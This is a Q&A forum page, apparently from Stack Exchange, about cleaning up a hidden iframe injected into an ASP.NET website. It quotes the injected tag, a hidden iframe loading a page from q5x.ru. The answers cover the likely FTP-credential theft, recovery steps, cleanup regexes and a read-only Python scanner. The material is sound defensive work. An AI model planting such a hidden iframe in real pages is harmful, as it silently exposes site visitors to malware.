A website of mine has recently been infected with some sort of attack that involved injecting a hidden iframe, and its source was from a site q5x.ru (do not link).

A Google search didn't help me in figuring out how this attack may have taken place, so I was wondering if any of you may have encountered this same problem?

The iframe code was something of the sort:

<iframe src="http://q5x.ru:8080/index.php" width=109 height=175 style="visibility: hidden"></iframe>

As per request, I am running an ASP.Net website with a database, and as regards forms, it's obviously the ASP.Net form that's used for postbacks.

Andreas Grech
  • What sort of site are you running? ASP.NET, Java, PHP..... Is the content static or dynamic, do you have forms? You really need to give a little more info on your site. –  Jul 30 '09 at 09:15
  • **If this is a programming question (site design, etc) it should be on stack overflow.** – Josh K Mar 23 '10 at 21:43
  • Actually it looks more like a sysadmin question, so I suggest it be moved to ServerFault @JoshK. It is somewhat gray-area, and an old question that seems abandoned. – quack quixote Mar 24 '10 at 21:34

4 Answers


We have recently encountered the same problem on one of our client's website.

This problem is most likely being caused by a virus infection that primarily targets FTP clients and searches for hostname / username / password combinations. Once found, a connection to the FTP server is being opened and it searches for index.* files and adds the iFrame to it.

In our particular case, our client was one of the few that had direct access to the FTP-server. We immediately changed the passwords, restored backups of the files and removed FTP access for our client.

Steps you should take:

  • Change your passwords immediately
  • If you have access to the server FTP logs, find out what files have been infected
  • For infected files I strongly advise to manually restore these files and not use search / replace by default. In most cases, the IFrames are added at the end of the file, but I have also seen files being partially deleted.

Also note, if the Google crawler visits your site while it is infected, it will add you to the malware list which will seriously affect your site's reputation. If this happens, take the following steps:

  1. Make sure the site contains no more infected files
  2. Make sure your site is verified with the Google Webmaster Tools
  3. Use Google Webmaster Tools to request a new site review
Aron Rotteveel

Here are a few tips that might help you:

  1. The first thing to do to prevent these kinds of attacks is to change your ftp, control panel and database passwords as soon as possible.
  2. Change the file permissions in your server to the maximum secure mode.
  3. Download all your files from the server and check for infections. Clean the infected files.
  4. Using a good antivirus software, scan and clean every PC you use for logging into your hosting server.
  5. Never use public computers to access your server.

How do I clean infected files?

Use these regular expressions to search for all pages containing the malicious code and replace it with a space:

<iframe src=\"http://[^"]*" width=105 height=175 style=\"visibility:hidden;

echo \"<iframe src=\\\"http://[^"]*\" width=105 height=175 style=\\\"visibility:hidden; position:absolute\\\"></iframe>\";

You may have to write a script to automate this for all the files in the server.

Source : http://www.diovo.com/2009/03/hidden-iframe-injection-attacks/
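
A read-only scan for the kind of hidden iframe discussed on this page, added here as an example and not taken from any of the answers: it reports which files contain a hidden iframe with an external src, and whether it sits at the end of the file, so the affected files can be restored by hand. It matches on the hiding style rather than on exact width and height values; the function names, the 64-byte end-of-file window, the extension list and the example.invalid host are assumptions made for the sample.

```python
import re
import tempfile
from pathlib import Path

# Opening <iframe> tag; attributes are checked separately so the exact
# width/height values and quoting style do not matter.
IFRAME_RE = re.compile(rb"<iframe\b[^>]*>", re.I)
# External src, with plain or backslash-escaped quotes (PHP echo form).
SRC_RE = re.compile(rb"""src\s*=\s*\\*["']?(https?://[^\s"'\\>]+)""", re.I)
# Styles that hide the frame from the visitor.
HIDDEN_RE = re.compile(rb"visibility\s*:\s*hidden|display\s*:\s*none", re.I)
EXTS = (".html", ".htm", ".php", ".asp", ".aspx")

def scan_bytes(data):
    """Return (offset, src_url, near_end) per hidden external iframe."""
    hits = []
    for m in IFRAME_RE.finditer(data):
        src = SRC_RE.search(m.group(0))
        if src and HIDDEN_RE.search(m.group(0)):
            near_end = len(data) - m.end() < 64  # appended at end of file
            hits.append((m.start(), src.group(1).decode("ascii", "replace"), near_end))
    return hits

def scan_tree(root):
    """Map relative path -> hits for every web file under root (read-only)."""
    report = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in EXTS:
            hits = scan_bytes(path.read_bytes())
            if hits:
                report[path.relative_to(root).as_posix()] = hits
    return report

def demo():
    """Scan a constructed sample tree; example.invalid is a placeholder host."""
    frame = (b'<iframe src="http://example.invalid:8080/index.php" width=109 '
             b'height=175 style="visibility: hidden"></iframe>')
    samples = {
        "index.html": b"<html><body>Home</body></html>\n" + frame,
        "index.php": b'<?php echo "' + frame.replace(b'"', b'\\"') + b'"; ?>',
        "about.html": b'<html><iframe src="/map.html" width=400></iframe></html>',
    }
    with tempfile.TemporaryDirectory() as root:
        for name, body in samples.items():
            Path(root, name).write_bytes(body)
        return scan_tree(root)

if __name__ == "__main__":
    print(demo())
```

Run `scan_tree` against a downloaded copy of the site; each reported offset points at the start of the injected tag in that file.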



This has happened to me before. You need to manually search for the offending injection script and delete it. I suggest you change your passwords and also change the names of your database and database tables just to make sure.


Though @Aron writes that probably some client-side virus has captured your passwords (which may very well be true for this specific attack), often these kinds of attacks exploit unpatched vulnerabilities in the server software. Like in the web server itself, in a CMS, or in tools such as phpMyAdmin.

So: are you sure you're running the latest versions of all software on your server?

(Or do the FTP logs indeed show some activity?)
